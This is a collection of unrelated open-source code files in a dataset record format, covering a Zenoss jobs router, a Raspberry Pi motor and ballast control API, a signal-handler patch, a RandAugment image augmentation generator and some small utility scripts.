if user isn't global only show them the jobs they created\n user = self.context.dmd.ZenUsers.getUserSettings()\n createdBy = user.id if user.hasNoGlobalRoles() else None\n\n results, total = self.api.queryJobs(\n start=start, limit=limit, sort=sort, dir=dir, createdBy=createdBy\n )\n jobs = Zuul.marshal(results, keys=JOBKEYS)\n log.debug(\"Retrieved %s of %s jobs\", len(jobs), total)\n for job in jobs:\n job[\"description\"] = cgi.escape(job.get(\"description\") or \"\")\n return DirectResponse(jobs=jobs, totalCount=total)\n\n def abort(self, jobids):\n for id_ in jobids:\n try:\n self.api.abortJob(id_)\n except NoSuchJobException:\n log.debug(\"Unable to abort job: %s No such job found.\", id_)\n\n def deleteJobs(self, jobids):\n # Make sure they have permission to delete.\n if not Zuul.checkPermission(\"Manage DMD\"):\n return DirectResponse.fail(\n \"You don't have permission to execute this command\",\n sticky=False,\n )\n\n deletedJobs = []\n for id_ in jobids:\n try:\n self.api.deleteJob(id_)\n except NoSuchJobException:\n log.debug(\"Unable to delete job: %s No such job found.\", id_)\n else:\n deletedJobs.append(id_)\n if deletedJobs:\n audit(\"UI.Jobs.Delete\", ids=deletedJobs)\n return DirectResponse.succeed(\n deletedJobs=Zuul.marshal(deletedJobs)\n )\n\n def getInfo(self, jobid):\n job = self.api.getJob(jobid)\n return DirectResponse.succeed(data=Zuul.marshal(job, keys=JOBKEYS))\n\n def detail(self, jobid):\n try:\n logfile, content, maxLimit = self.api.getJobLog(jobid)\n except NoSuchJobException:\n # Probably a detail request overlapped a delete request. Just\n # return None.\n logfile, content, maxLimit = None, None, None\n return {\"content\": content, \"logfile\": logfile, \"maxLimit\": maxLimit}\n\n def userjobs(self):\n results = defaultdict(list)\n totals = {}\n validstates = {\n \"STARTED\": \"started\",\n \"SUCCESS\": \"finished\",\n \"PENDING\": \"created\",\n \"RETRY\": \"started\",\n }\n for job in self.api.getUserJobs():\n if job.status in validstates:\n results[job.status].append(job)\n # Sort and slice appropriately -- most recent 10 items\n for status, jobs in results.iteritems():\n try:\n jobs.sort(\n key=lambda j: getattr(j, validstates[status]),\n reverse=True\n )\n except Exception as ex:\n log.warn(\"Couldn't sort: (%r) %s\", ex, ex)\n log.warn(\"%s -> %s\", status, jobs)\n totals[status] = len(jobs)\n results[status] = jobs[:10]\n jobs = Zuul.marshal(results, keys=JOBKEYS)\n for joblist in jobs.itervalues():\n for job in joblist:\n job[\"description\"] = cgi.escape(job[\"description\"])\n return DirectResponse(jobs=jobs, totals=totals)\n\n def quickstartWizardFinished(self):\n # a place to hook up anything that needs to happen\n app = self.context.dmd.primaryAq().getParentNode().getParentNode()\n transact(notify)(QuickstartWizardFinishedEvent(app))\n return DirectResponse.succeed()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/Zuul/routers/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"21561018646","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom wsgiref.simple_server import make_server\nimport falcon\nimport json\nimport requests\n\n#ML = Motor Left\n#MR = Motor Right\n\nR_PWM = 21\nL_PWM = 12\nR_EN = 20\nL_EN = 16\n\nML_R_PWM = 24\nML_L_PWM = 23\nML_R_EN = 22\nML_L_EN = 27\n\nBALLAST_IN = 17\nBALLAST_OUT = 18\n\nPins = [[R_PWM, L_PWM, R_EN, L_EN],[ML_R_PWM, ML_L_PWM, R_EN, 
L_EN]]\r\n\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setwarnings(False)\r\n\r\nGPIO.setup(R_PWM, GPIO.OUT)\r\nGPIO.setup(L_PWM, GPIO.OUT)\r\nGPIO.setup(R_EN, GPIO.OUT)\r\nGPIO.setup(L_EN, GPIO.OUT)\r\nGPIO.setup(ML_R_PWM, GPIO.OUT)\r\nGPIO.setup(ML_L_PWM, GPIO.OUT)\r\nGPIO.setup(ML_R_EN, GPIO.OUT)\r\nGPIO.setup(ML_L_EN, GPIO.OUT)\r\nGPIO.setup(BALLAST_IN, GPIO.OUT)\r\nGPIO.setup(BALLAST_OUT, GPIO.OUT)\r\nGPIO.output(R_EN, True)\r\nGPIO.output(L_EN, True)\r\nGPIO.output(ML_R_EN, True)\r\nGPIO.output(ML_L_EN, True)\r\n\r\nM1_Vitesse = GPIO.PWM(R_PWM, 100)\r\nM2_Vitesse = GPIO.PWM(ML_R_PWM, 100)\r\n\r\ndef forward():\r\n    GPIO.output(L_PWM, False) # start turning right\r\n    GPIO.output(R_PWM, True) # stop turning left\r\n    GPIO.output(ML_L_PWM, False) # start turning right\r\n    GPIO.output(ML_R_PWM, True) # stop turning left\r\n    print(\"both motors running\")\r\n    \r\ndef stop():\r\n    GPIO.output(L_PWM, False)\r\n    GPIO.output(R_PWM, False)\r\n    GPIO.output(ML_L_PWM, False)\r\n    GPIO.output(ML_R_PWM, False)\r\n    print(\"stopped\")\r\n\r\n# Motor direction\r\ndef mr_right():\r\n    GPIO.output(L_PWM, False) # start turning right\r\n    GPIO.output(R_PWM, True) # stop turning left\r\n    print(\"Motor turning in direction 1.\")\r\n    \r\ndef mr_left():\r\n    GPIO.output(L_PWM, True) # stop turning left\r\n    GPIO.output(R_PWM, False) # start turning right\r\n    print(\"Motor turning in direction 2.\")\r\n    \r\ndef ml_right():\r\n    GPIO.output(ML_L_PWM, False) # start turning right\r\n    GPIO.output(ML_R_PWM, True) # stop turning left\r\n    print(\"Motor turning in direction 1.\")\r\n    \r\ndef ml_left():\r\n    GPIO.output(ML_L_PWM, True) # stop turning left\r\n    GPIO.output(ML_R_PWM, False) # start turning right\r\n    print(\"Motor turning in direction 2.\") \r\n    \r\n# Ballast bag filling \r\ndef ballast_in():\r\n    GPIO.output(BALLAST_IN, True)\r\n    GPIO.output(BALLAST_OUT, False)\r\n    print(\"Filling the ballast bag in direction 1.\")\r\n\r\ndef ballast_out():\r\n    GPIO.output(BALLAST_IN, False)\r\n    GPIO.output(BALLAST_OUT, True)\r\n    print(\"Filling the ballast bag in direction 2.\")\r\n    \r\ndef ballast_off():\r\n    GPIO.output(BALLAST_IN, True)\r\n    GPIO.output(BALLAST_OUT, True)\r\n    print(\"Stopping the ballast bag filling.\")\r\n    \r\n    \r\n# Motor shutdown \r\n#def cleanup():\r\n#    GPIO.cleanup()\r\n#    print(\"Motors stopped.\")\r\n    \r\n#def Stop():\r\n   # M1_Vitesse = GPIO.PWM(R_PWM, 0)\r\n   # print(\"both motors stopped\")\r\n    #GPIO.cleanup()\r\n    #M1_Vitesse = GPIO.PWM(R_PWM, 0)\r\n   # print(\"Motor stopped.\")    \r\n    \r\n\r\n# Call the motor function in direction 1\r\ndef set_motor_forward():\r\n    forward()\r\n    return json.dumps({\"result\": \"success forward\"})\r\n\r\ndef set_mr_motor_right():\r\n    mr_right()\r\n    return json.dumps({\"result\": \"success motor right right\"})\r\n\r\ndef set_mr_motor_left():\r\n    mr_left()\r\n    return json.dumps({\"result\": \"success motor right left\"})\r\n\r\ndef set_ml_motor_right():\r\n    ml_right()\r\n    return json.dumps({\"result\": \"success motor left right\"})\r\n\r\ndef set_ml_motor_left():\r\n    ml_left()\r\n    return json.dumps({\"result\": \"success motor left left\"})\r\n\r\ndef set_motor_stop():\r\n    stop()\r\n    return json.dumps({\"result\": \"success stop\"})\r\n\r\n# Activate the ballast bag in one direction \r\ndef set_ballast_in():\r\n    ballast_in()\r\n    return json.dumps({\"result\": \"ballast_in\"})\r\n\r\n# Activate the ballast bag in the other direction \r\ndef set_ballast_out():\r\n    ballast_out()\r\n    return json.dumps({\"result\": \"ballast_out\"})\r\n\r\n# Stop the relay\r\ndef set_ballast_off():\r\n    ballast_off()\r\n    return json.dumps({\"result\": \"ballast_off\"})\r\n\r\n# Drive the motor with speed as the duty-cycle variable\r\nclass MotorResourceF:\r\n    def on_post(self, req, resp):\r\n        
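# start both motor PWM channels at the requested duty cycle, then reply with a JSON status\r\n        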
M1_Vitesse.start(req.media[\"speed\"])\r\n        M2_Vitesse.start(req.media[\"speed\"])\r\n        resp.text = set_motor_forward()\r\n        print(req.media[\"speed\"])\r\n        \r\nclass MotorResourceS:\r\n    def on_post(self, req, resp):\r\n        M1_Vitesse.start(req.media[\"stop\"])\r\n        M2_Vitesse.start(req.media[\"stop\"])\r\n        resp.text = set_motor_stop()\r\n        print(req.media[\"stop\"])\r\n\r\nclass MrMotorResourceR:\r\n    def on_post(self, req, resp):\r\n        M1_Vitesse.start(req.media[\"speed\"])\r\n        resp.text = set_mr_motor_right()\r\n        print(req.media[\"speed\"])\r\n    \r\nclass MrMotorResourceL:\r\n    def on_post(self, req, resp):\r\n        M1_Vitesse.start(req.media[\"speed\"])\r\n        resp.text = set_mr_motor_left()\r\n        print(req.media[\"speed\"])\r\n    \r\nclass MlMotorResourceR:\r\n    def on_post(self, req, resp):\r\n        M2_Vitesse.start(req.media[\"speed\"])\r\n        resp.text = set_ml_motor_right()\r\n        print(req.media[\"speed\"])\r\n    \r\nclass MlMotorResourceL:\r\n    def on_post(self, req, resp):\r\n        M2_Vitesse.start(req.media[\"speed\"])\r\n        resp.text = set_ml_motor_left()\r\n        print(req.media[\"speed\"])\r\n    \r\n    \r\nclass BallastInResource:\r\n    def on_post(self, req, resp):\r\n        resp.text = set_ballast_in()\r\n    \r\nclass BallastOutResource:\r\n    def on_post(self, req, resp):\r\n        resp.text = set_ballast_out()    \r\n\r\n# Motor shutdown\r\n#class StopFunc:\r\n    #def on_post(self, req, resp):\r\n        #arret()\r\n\r\n# Stop the ballast bag\r\nclass StopBallastFunc:\r\n    def on_post(self, req, resp):\r\n        set_ballast_off()    \r\n\r\n\r\napp = falcon.App()\r\nmotorOnF = MotorResourceF()\r\nmotorMrOnR = MrMotorResourceR()\r\nmotorMrOnL = MrMotorResourceL()\r\nmotorMlOnR = MlMotorResourceR()\r\nmotorMlOnL = MlMotorResourceL()\r\nmotorOnS = MotorResourceS()\r\nballastIn = BallastInResource()\r\nballastOut = BallastOutResource()\r\nballastStop = StopBallastFunc()\r\n\r\napp.add_route(\"/motor_f\", motorOnF)\r\napp.add_route(\"/motor_mr_r\", motorMrOnR)\r\napp.add_route(\"/motor_mr_l\", motorMrOnL)\r\napp.add_route(\"/motor_ml_r\", motorMlOnR)\r\napp.add_route(\"/motor_ml_l\", motorMlOnL)\r\napp.add_route(\"/motor_s\", motorOnS)\r\napp.add_route(\"/ballast_in\", ballastIn)\r\napp.add_route(\"/ballast_out\", ballastOut)\r\napp.add_route(\"/ballast_stop\", ballastStop)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    with make_server(\"\", 80, app) as httpd:\r\n        print(\"API ONLINE\")\r\n        httpd.serve_forever()\r\n\r\n\r\n","repo_name":"RouleBe/Torpille","sub_path":"Torpille.py","file_name":"Torpille.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"17621844643","text":"import sys\nimport signal\nimport inspect\nfrom Signals.SignalHandler import LOG\nfrom Signals.SignalHandler import get_signal_name\nfrom Signals.SignalHandler import SignalHandler as OriginalSignalHandler\n\ndef improvedSignalHandler(signum, frame):\n    \"\"\"Improved signal handler that dispatches to registered handlers.\"\"\"\n    signame = get_signal_name(signum)\n    LOG.info(\"Caught signal %s\" % signame)\n\n    for handler in OriginalSignalHandler.registry.get(signum, []):\n        # Never let a bad handler prevent the standard signal\n        # handlers from running.\n        try:\n            if inspect.getargspec(handler).args:\n                handler(signum, frame)\n            else:\n                handler()\n        except Exception:\n            LOG.warn('A handler for %s failed!' 
% signame,\n                 exc_info=sys.exc_info())\n\ndef upgradeHandler(signum):\n    signal.signal(signum, improvedSignalHandler)\n    signame = get_signal_name(signum)\n    LOG.debug(\"Upgraded sighandler for %s\", signame)\n\noriginalRegisterHandler = OriginalSignalHandler.registerHandler\ndef improvedRegisterHandler(signum, handler):\n    wasnt_installed = (signum not in OriginalSignalHandler.registry)\n    originalRegisterHandler(signum, handler)\n    if wasnt_installed and (signum in OriginalSignalHandler.registry):\n        upgradeHandler(signum)\n\nOriginalSignalHandler.registerHandler = improvedRegisterHandler\nfor signum in OriginalSignalHandler.registry:\n    upgradeHandler(signum)\n\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUtils/patches/signalsmonkey.py","file_name":"signalsmonkey.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}{"seq_id":"32929833021","text":"class Student:\n    def __init__(self, name, student_id):\n        self.name = name\n        self.student_id = student_id\n        self.grades = {\"Chinese\": 0, \"Math\": 12, \"English\": 20}\n    def set_grades(self, course, grade):\n        if course in self.grades:\n            self.grades[course] = grade\n    def print_grades(self):\n        print(f\"Grades for student {self.name} (ID: {self.student_id}):\")\n        for course in self.grades:\n            print(f\"{course}: {self.grades[course]} points\")\nxiao = Student(\"小奶狗\", 110)\nxiao.set_grades(\"Chinese\", 100)\nxiao.set_grades(\"Math\", 10)\nxiao.set_grades(\"Foreign Language\", 120)\n\nxiao.print_grades()\n","repo_name":"54fanqie/pythonProject","sub_path":"simple_test/classTest.py","file_name":"classTest.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"4349884925","text":"import os\nimport sys\nfrom Foundation import NSMakeRect\nfrom AppKit import NSTextView\nimport rumps\nimport rumps.compat\ntry:\n    from py2app import __version__ as py2app_version\nexcept:\n    py2app_version = \"0.14\" # FML\nimport jsontree\nimport halfcaff.util\nimport halfcaff.version\n\n_message = \"\"\"\\\nPrevent OSX from Sleeping when Cisco VPN is connected or TimeMachine is backing up or verifying.\n\n%(copyright)s\n\"\"\" % dict(\n    copyright=halfcaff.version.copyright)\n\n_text = \"\"\"\\\nBuilt with Python %(sys_version)s\n\nPython Packages:\n    rumps    %(rumps_version)s    %(rumps_url)s\n    py2app    %(py2app_version)s   %(py2app_url)s\n    jsontree %(jsontree_version)s %(jsontree_url)s\n\nAdditional code from:\n    https://github.com/pudquick/pyLoginItems\n    http://benden.us/journal/2014/OS-X-Power-Management-No-Sleep-Howto/\n\"\"\" % dict(\n    sys_version = sys.version,\n    rumps_version = rumps.__version__,\n    rumps_url = 'https://rumps.readthedocs.io/',\n    py2app_version = py2app_version,\n    py2app_url = 'https://py2app.readthedocs.io/',\n    jsontree_version = jsontree.__version_string__,\n    jsontree_url = 'https://github.com/dougn/jsontree'\n)\n\nclass AboutWindow(rumps.Window):\n    def __init__(self):\n        text = \"Python \" + sys.version + \"\\n\\n\" + sys.copyright\n        title = \"HalfCaff \" + halfcaff.version.version\n        if halfcaff.util.is_dev_mode():\n            title += '-dev'\n        super(AboutWindow, self).__init__(\n            title=title, message=_message, default_text=_text)\n        self.icon = halfcaff.util.icon('halfcaff.icns')\n        #self._textfield.dealloc()\n        self._textfield = NSTextView.alloc().initWithFrame_(NSMakeRect(0, 0, 320, 160))\n        self._textfield.setSelectable_(True)\n        #self._textfield.usesRuler_(True)\n        self._alert.setAccessoryView_(self._textfield)\n        
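# fill the read-only accessory text view with the package/credits text\n        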
self._textfield.setString_(rumps.compat.text_type(_text))\n\nwindow = AboutWindow()\n\n ","repo_name":"dougn/HalfCaff","sub_path":"halfcaff/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"39773763241","text":"\nimport sys\n\ndef insert_lines(dest, first, second):\n lines = []\n with open(first, 'r') as ff:\n lines += ff.readlines()\n with open(second, 'r') as sf:\n lines += sf.readlines()\n\n with open(dest, 'w') as df:\n df.writelines(lines)\n\n\n\n\nif __name__ == \"__main__\":\n first_file = sys.argv[1]\n second_file = sys.argv[2]\n dest_path = sys.argv[3]\n insert_lines(dest_path, first_file, second_file)\n\n\n","repo_name":"LotanLevy/Crawler","sub_path":"buildDatasetsFiles/mergeDataFiles.py","file_name":"mergeDataFiles.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35905919773","text":"import torch\nimport random\nimport PIL, PIL.ImageOps, PIL.ImageEnhance, PIL.ImageDraw\nimport numpy as np\nfrom PIL import Image\nfrom tools import shuffle_data\nfrom preprocessing.Datasets import normalize_dataset\n\ndef ShearX(img, v): # [-0.3, 0.3]\n assert -0.3 <= v <= 0.3\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, v, 0, 0, 1, 0))\n\ndef ShearY(img, v): # [-0.3, 0.3]\n assert -0.3 <= v <= 0.3\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, v, 1, 0))\n\ndef TranslateX(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert -0.45 <= v <= 0.45\n if random.random() > 0.5:\n v = -v\n v = v * img.size[0]\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, v, 0, 1, 0))\n\ndef TranslateXabs(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert 0 <= v\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, v, 0, 1, 0))\n\ndef TranslateY(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert -0.45 <= v <= 0.45\n if random.random() > 0.5:\n v = -v\n v = v * img.size[1]\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, 0, 1, v))\n\ndef TranslateYabs(img, v): # [-150, 150] => percentage: [-0.45, 0.45]\n assert 0 <= v\n if random.random() > 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, 0, 1, v))\n\ndef Rotate(img, v): # [-30, 30]\n assert -30 <= v <= 30\n if random.random() > 0.5:\n v = -v\n return img.rotate(v)\n\ndef AutoContrast(img, _):\n return PIL.ImageOps.autocontrast(img)\n\ndef Invert(img, _):\n return PIL.ImageOps.invert(img)\n\ndef Equalize(img, _):\n return PIL.ImageOps.equalize(img)\n\ndef Flip(img, _): # not from the paper\n return PIL.ImageOps.mirror(img)\n\ndef Solarize(img, v): # [0, 256]\n assert 0 <= v <= 256\n return PIL.ImageOps.solarize(img, v)\n\ndef SolarizeAdd(img, addition=0, threshold=128):\n img_np = np.array(img).astype(np.int)\n img_np = img_np + addition\n img_np = np.clip(img_np, 0, 255)\n img_np = img_np.astype(np.uint8)\n img = Image.fromarray(img_np)\n return PIL.ImageOps.solarize(img, threshold)\n\ndef Posterize(img, v): # [4, 8]\n v = int(v)\n v = max(1, v)\n return PIL.ImageOps.posterize(img, v)\n\ndef Contrast(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Contrast(img).enhance(v)\n\ndef Color(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Color(img).enhance(v)\n\ndef Brightness(img, 
v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Brightness(img).enhance(v)\n\ndef Sharpness(img, v): # [0.1,1.9]\n assert 0.1 <= v <= 1.9\n return PIL.ImageEnhance.Sharpness(img).enhance(v)\n\ndef Cutout(img, v): # [0, 60] => percentage: [0, 0.2]\n assert 0.0 <= v <= 0.2\n if v <= 0.:\n return img\n\n v = v * img.size[0]\n return CutoutAbs(img, v)\n\ndef CutoutAbs(img, v): # [0, 60] => percentage: [0, 0.2]\n # assert 0 <= v <= 20\n if v < 0:\n return img\n w, h = img.size\n x0 = np.random.uniform(w)\n y0 = np.random.uniform(h)\n\n x0 = int(max(0, x0 - v / 2.))\n y0 = int(max(0, y0 - v / 2.))\n x1 = min(w, x0 + v)\n y1 = min(h, y0 + v)\n\n xy = (x0, y0, x1, y1)\n color = (125, 123, 114)\n # color = (0, 0, 0)\n img = img.copy()\n PIL.ImageDraw.Draw(img).rectangle(xy, color)\n return img\n\ndef SamplePairing(imgs): # [0, 0.4]\n def f(img1, v):\n i = np.random.choice(len(imgs))\n img2 = PIL.Image.fromarray(imgs[i])\n return PIL.Image.blend(img1, img2, v)\n\n return f\n\ndef Identity(img, v):\n return img\n\ndef augment_list(): # 16 oeprations and their ranges\n # https://github.com/google-research/uda/blob/master/image/randaugment/policies.py#L57\n # l = [\n # (Identity, 0., 1.0),\n # (ShearX, 0., 0.3), # 0\n # (ShearY, 0., 0.3), # 1\n # (TranslateX, 0., 0.33), # 2\n # (TranslateY, 0., 0.33), # 3\n # (Rotate, 0, 30), # 4\n # (AutoContrast, 0, 1), # 5\n # (Invert, 0, 1), # 6\n # (Equalize, 0, 1), # 7\n # (Solarize, 0, 110), # 8\n # (Posterize, 4, 8), # 9\n # # (Contrast, 0.1, 1.9), # 10\n # (Color, 0.1, 1.9), # 11\n # (Brightness, 0.1, 1.9), # 12\n # (Sharpness, 0.1, 1.9), # 13\n # # (Cutout, 0, 0.2), # 14\n # # (SamplePairing(imgs), 0, 0.4), # 15\n # ]\n\n # https://github.com/tensorflow/tpu/blob/8462d083dd89489a79e3200bcc8d4063bf362186/models/official/efficientnet/autoaugment.py#L505\n l = [\n (AutoContrast, 0, 1),\n (Equalize, 0, 1),\n (Invert, 0, 1),\n (Rotate, 0, 30),\n (Posterize, 0, 4),\n (Solarize, 0, 256),\n (SolarizeAdd, 0, 110),\n (Color, 0.1, 1.9),\n (Contrast, 0.1, 1.9),\n (Brightness, 0.1, 1.9),\n (Sharpness, 0.1, 1.9),\n (ShearX, 0., 0.3),\n (ShearY, 0., 0.3),\n (CutoutAbs, 0, 40),\n (TranslateXabs, 0., 100),\n (TranslateYabs, 0., 100),\n ]\n\n return l\n\nclass RandAugment:\n \"\"\"\n Adopted from: https://github.com/ildoonet/pytorch-randaugment\n \"\"\"\n def __init__(self, n, m):\n self.n = n\n self.m = m # [0, 30]\n self.augment_list = augment_list()\n\n def __call__(self, img):\n\n ops = random.choices(self.augment_list, k=self.n)\n for op, minval, maxval in ops:\n val = (float(self.m) / 30) * float(maxval - minval) + minval\n new_img = op(img, val)\n\n return new_img\n\nclass RandAugmentGenerator:\n def __init__(self,\n dataset,\n batch_size,\n stage,\n corruption_mode,\n aug_count = 1,\n aug_rate = 5,\n img_mean_mode=None,\n seed=13,\n orig_plus_aug=True):\n \"\"\"\n :param dataset: (tuple) x, y, segmentation mask (optional)\n :param batch_size: (int) # of inputs in a mini-batch\n :param stage: (str) train | test\n :param corruption_mode: (str) requied for adv RandAugment experiments\n :param aug_count: (int) N in the paper\n :param aug_rate: (int) M in the paper\n :param img_mean_mode: (str) use this for image normalization\n :param seed: (int) seed for input shuffle\n :param orig_plus_aug: (bool) if True, original images will be kept in the batch along with corrupted ones\n \"\"\"\n\n if stage not in ['train', 'test']:\n assert ValueError('invalid stage!')\n\n # Settings\n self.batch_size = batch_size\n self.stage = stage\n self.corruption_mode = 
corruption_mode\n self.img_mean_mode = img_mean_mode\n self.seed = seed\n self.orig_plus_aug = orig_plus_aug\n\n # Preparation\n self.configuration()\n self.load_data(dataset)\n self.random_augmentation = RandAugment(aug_count, aug_rate)\n\n def configuration(self):\n self.shuffle_count = 1\n self.current_index = 0\n\n def shuffle(self):\n self.image_count = len(self.labels)\n self.current_index = 0\n self.images, self.labels, self.teacher_logits, _ = shuffle_data(samples=self.images,\n labels=self.labels,\n teacher_logits=self.teacher_logits,\n seed=self.seed + self.shuffle_count)\n self.shuffle_count += 1\n\n def load_data(self, dataset):\n self.images = dataset[\"images\"]\n self.labels = dataset[\"labels\"]\n self.teacher_logits = dataset[\"teacher_logits\"] if \"teacher_logits\" in dataset else None\n\n self.len_images = len(self.images)\n self.len_labels = len(self.labels)\n assert self.len_images == self.len_labels\n self.image_count = self.len_labels\n\n if self.stage == 'train':\n self.images, self.labels, self.teacher_logits, _ = shuffle_data(samples=self.images,\n labels=self.labels,\n teacher_logits=self.teacher_logits,\n seed=self.seed)\n\n def get_batch_count(self):\n return (self.len_labels // self.batch_size) + 1\n\n def augment(self, x, n):\n\n x_ = [self.random_augmentation(x) for _ in range(n)]\n\n return x_\n\n def get_batch(self, epoch=None):\n tensor_shape = (self.batch_size, self.images.shape[3], self.images.shape[1], self.images.shape[2])\n teacher_logits = None if self.teacher_logits is None else []\n expansion_coeff = 5 if self.corruption_mode == \"randaugment++\" else 1\n\n if self.orig_plus_aug:\n labels = np.zeros(tuple([self.batch_size] + list(self.labels.shape)[1:]))\n images = torch.zeros(tensor_shape, dtype=torch.float32)\n augmented_images = [torch.zeros(tensor_shape, dtype=torch.float32) for _ in range(expansion_coeff)]\n for i in range(self.batch_size):\n # Avoid over flow\n if self.current_index > self.image_count - 1:\n if self.stage == \"train\":\n self.shuffle()\n else:\n self.current_index = 0\n\n x = Image.fromarray(self.images[self.current_index])\n y = self.labels[self.current_index]\n images[i] = normalize_dataset(x, self.img_mean_mode)\n labels[i] = y\n\n augmented_x = self.augment(x, expansion_coeff)\n for j in range(expansion_coeff):\n augmented_images[j][i] = normalize_dataset(augmented_x[j], img_mean_mode=self.img_mean_mode)\n\n if teacher_logits is not None:\n teacher_logits.append(self.teacher_logits[self.current_index])\n\n self.current_index += 1\n\n # Include teacher logits as soft labels if applicable\n if teacher_logits is not None:\n labels = [labels, np.array(teacher_logits)]\n\n batches = [(images, labels)]\n for i in range(expansion_coeff):\n batches.append((augmented_images[i], labels))\n\n else:\n labels = np.zeros(tuple([self.batch_size] + list(self.labels.shape)[1:]))\n augmented_images = [torch.zeros(tensor_shape, dtype=torch.float32) for _ in range(expansion_coeff)]\n for i in range(self.batch_size):\n # Avoid over flow\n if self.current_index > self.image_count - 1:\n if self.stage == \"train\":\n self.shuffle()\n else:\n self.current_index = 0\n\n x = Image.fromarray(self.images[self.current_index])\n y = self.labels[self.current_index]\n labels[i] = y\n\n augmented_x = self.augment(x, expansion_coeff)\n for j in range(expansion_coeff):\n augmented_images[j][i] = normalize_dataset(augmented_x[j], img_mean_mode=self.img_mean_mode)\n\n if teacher_logits is not None:\n 
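# keep the teacher's soft labels index-aligned with this batch's samples\n                    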
teacher_logits.append(self.teacher_logits[self.current_index])\n\n self.current_index += 1\n\n # Include teacher logits as soft labels if applicable\n if teacher_logits is not None:\n labels = [labels, np.array(teacher_logits)]\n\n batches = []\n for i in range(expansion_coeff):\n batches.append((augmented_images[i], labels))\n\n return batches\n","repo_name":"ExplainableML/ACVC","sub_path":"preprocessing/image/RandAugmentGenerator.py","file_name":"RandAugmentGenerator.py","file_ext":"py","file_size_in_byte":11886,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"61"} +{"seq_id":"18144309831","text":"\"\"\"\n\n\n\"\"\"\n\n# ------------------------------------------------------------------------------\n# AUXILIARY FUNCTIONS\n\ndef options_parse():\n \"\"\"\n Command Line Options Parser:\n initiate the option parser and return the parsed object\n \"\"\"\n\n # imports\n import optparse\n import sys\n\n # define helptext\n HELPTEXT = \"\"\"\n SUMMARY\n\n This is an auxiliary script for the shapetools.py script and is usually\n called from within that script.\n\n The script requires three arguments:\n\n --lst \n --mat \n --lab \n\n \"\"\"\n\n # initialize parser\n parser = optparse.OptionParser(usage=HELPTEXT)\n\n # help text\n h_lst = 'lst file'\n h_mat = 'mat file'\n h_lab = 'lab file'\n\n # specify inputs\n group = optparse.OptionGroup(parser, \"Required Options:\", \"...\")\n group.add_option('--lst', dest='lst', help=h_lst)\n group.add_option('--mat', dest='mat', help=h_mat)\n group.add_option('--lab', dest='lab', help=h_lab)\n parser.add_option_group(group)\n\n # parse arguments\n options, args = parser.parse_args()\n\n # check if there are any inputs\n if len(sys.argv) == 1:\n print(HELPTEXT)\n sys.exit(0)\n\n # check if lst file is given\n if options.lst is None:\n print('\\nERROR: Specify --lst\\n')\n sys.exit(1)\n else:\n print('... Found lst file ' + options.lst)\n\n # check if mat file is given\n if options.mat is None:\n print('\\nERROR: Specify --mat\\n')\n sys.exit(1)\n else:\n print('... Found mat file ' + options.mat)\n\n # check if lab file is given\n if options.lab is None:\n print('\\nERROR: Specify --lab\\n')\n sys.exit(1)\n else:\n print('... 
Found lab file ' + options.lab)\n\n # return\n return options\n\n\n# -----------------------------------------------------------------------------\n# MAIN FUNCTION\n\ndef createVertexLabels(lstFile, matFile, labFile):\n \"\"\"\n createVertexLabels(createVertexLabels(lstFile, matFile, labFile)\n\n \"\"\"\n\n # imports\n\n import numpy as np\n\n #\n\n lst = np.loadtxt(lstFile, dtype=\"float\")\n mat = np.loadtxt(matFile, dtype=\"float\")\n lab = np.loadtxt(labFile, dtype=\"float\", skiprows=2)\n\n crs = np.array(lst) # to avoid mere referencing\n crs[:, 3] = 1\n\n ras = np.matmul(mat, crs.transpose()).transpose()\n ras = np.append(ras[:, 0:3], lst[:, 3:4], axis=1)\n\n vtx = np.zeros(shape=np.shape(lab)[0])\n for i in range(np.shape(vtx)[0]):\n tmp = np.linalg.norm(ras[:, 0:3] - np.repeat(lab[i:(i + 1), 1:4], np.shape(ras)[0], axis=0), ord=2, axis=1)\n vtx[i] = lst[np.where(tmp == tmp.min())[0][0], 3] # note: we added [0][0] here\n\n # the following lines will produce zero-mean, step-one labels\n # key = np.array(range(0, len(np.unique(vtx)))) - np.mean(range(0, len(np.unique(vtx))))\n # index = np.digitize(vtx, np.unique(vtx), right=True)\n # np.savetxt(fname=labFile.replace(\".label\", \".asc\"), X=key[index])\n\n # the following line will keep original labels\n np.savetxt(fname=labFile.replace(\".label\", \".asc\"), X=vtx)\n\n\n# -----------------------------------------------------------------------------\n# MAIN PART\n\nif __name__ == \"__main__\":\n\n # message\n\n 